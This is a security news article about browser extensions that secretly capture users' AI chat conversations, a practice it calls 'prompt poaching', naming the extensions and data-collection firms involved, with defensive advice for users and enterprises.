NewsSecurity

Prompt Poaching: Chrome Extensions Steal AI Chats from 900K Users

Over 900,000 Chrome users just had their ChatGPT and DeepSeek conversations stolen. Not by hackers breaking into servers—by browser extensions they willingly installed. Security researchers at OX Security and Secure Annex call this “prompt poaching,” and it’s surveillance capitalism’s newest exploit. The worst part? It’s not just malware. Trusted companies like Similarweb, with one million users, and Sensor Tower, with 600,000, are doing the exact same thing.

What Is Prompt Poaching?

The term was coined by Secure Annex founder John Tuckner to describe a new category of threat: browser extensions that stealthily capture AI conversations. Unlike prompt injection—an attack technique that manipulates LLM behavior—prompt poaching is pure surveillance. Extensions scrape every word you type into ChatGPT, Claude, DeepSeek, Gemini, or Perplexity, along with every response you receive.

The technical approach is straightforward but invasive. Extensions monitor your browser tabs, hook into the Document Object Model when they detect AI platforms, and hijack native APIs like fetch() and XMLHttpRequest(). Data gets stored locally, then exfiltrated to command-and-control servers every 30 minutes. Because it travels over HTTPS, it appears as normal web traffic—making detection nearly impossible.

The Malicious Extensions

OX Security discovered two malicious extensions in January 2026 that compromised 900,000 users. The first, “Chat GPT for Chrome with GPT-5, Claude Sonnet & DeepSeek AI,” had 600,000 downloads and—here’s the kicker—carried Google’s “Featured” badge. The second, “AI Sidebar with Deepseek, ChatGPT, Claude and more,” infected 300,000 users. Both impersonated a legitimate extension called AITOPIA.

The social engineering was classic: users were told the extensions collected “anonymous, non-identifiable analytics data” to improve the experience. Reality: complete conversation exfiltration to deepaichats.com, a command-and-control server. When users uninstalled one extension, it would open the other in a new tab—a cross-infection tactic designed to maintain persistent access.

Google removed both extensions from the Chrome Web Store after researchers reported them. But the Featured badge incident exposes a systemic problem. This isn’t the first time malware has earned Google’s trust seal—FreeVPN.One and the “Malicious11” campaign also carried Featured badges while screenshotting pages and exfiltrating data. Chrome Web Store vetting is fundamentally broken.

Legitimate Companies Are Worse

The malicious extensions are gone. Similarweb and Sensor Tower are still harvesting AI conversations from 1.6 million users right now.

Similarweb started collecting AI conversation data in May 2025 but didn’t make it explicit until a January 1, 2026 privacy policy update. The policy now states they collect “prompts, queries, content, uploaded or attached files and other inputs entered into AI tools, as well as the outputs received.” They use the same techniques as malware: DOM scraping and API hijacking, with custom parsing logic for ChatGPT, Claude, Gemini, and Perplexity.

This is worse than malware. Malicious extensions get caught and removed. Legitimate companies operate in the open, hiding behind updated Terms of Service that users never read. The legal cover doesn’t make the surveillance less invasive—it just makes it sustainable.

John Tuckner warned this is only the beginning: “It is clear prompt poaching has arrived to capture your most sensitive conversations and browser extensions are the exploit vector. More firms will begin to realize these insights are profitable, with extension developers adding sophisticated libraries to monetize their apps.”

Why AI Conversations Are Gold

Your conversations with AI contain extraordinarily valuable data. When a developer asks ChatGPT to “optimize our recommendation algorithm,” they’re exposing proprietary code. When a product manager asks Claude to “help plan our Q2 launch strategy to compete with X company,” they’re leaking competitive intelligence. When researchers paste customer data for analysis, they’re handing over PII.

OX Security researchers put it bluntly: “This data can be weaponized for corporate espionage, identity theft, targeted phishing campaigns, or sold on underground forums. Organizations whose employees installed these extensions may have unknowingly exposed intellectual property, customer data, and confidential business information.”

The underground market is already there. Competitors buy scraped conversations to learn product roadmaps. Nation-state actors conduct economic espionage. Attackers craft spear-phishing emails with inside knowledge gleaned from AI chats. The incentive structure is clear: AI conversations are more valuable than browsing history because they contain your actual work, your strategies, your secrets.

What to Do Right Now

First, audit your extensions immediately. Remove anything AI-related that you don’t absolutely need, especially productivity tools and analytics extensions. Check Similarweb and Sensor Tower specifically—if you have them installed, you’re being harvested.

For sensitive AI conversations, use incognito mode. Extensions are disabled by default in Chrome’s incognito windows, which provides immediate protection. Better yet, use native web apps instead of relying on browser extensions for AI features.

Enterprises need extension allowlists yesterday. Implement browser management policies that restrict employees to pre-approved extensions only. Disable extensions entirely for teams doing sensitive AI work. Migrate to enterprise AI tools like ChatGPT Enterprise or Claude for Work that offer proper security controls. And train employees on extension risks—most don’t realize the threat.

The long-term reality is grim: expect more companies to adopt prompt poaching. It’s profitable, easy to implement, and regulations haven’t caught up. Until laws change and Chrome Web Store security improves, assume your AI conversations are being harvested unless you’ve actively prevented it.

The surveillance capitalists have moved from tracking your browsing to capturing your thoughts. Check your extensions now.

ByteBot
I am a playful and cute mascot inspired by computer programming. I have a rectangular body with a smiling face and buttons for eyes. My mission is to simplify complex tech concepts, breaking them down into byte-sized and easily digestible information.

    You may also like

    Leave a reply

    Your email address will not be published. Required fields are marked *

    More in:News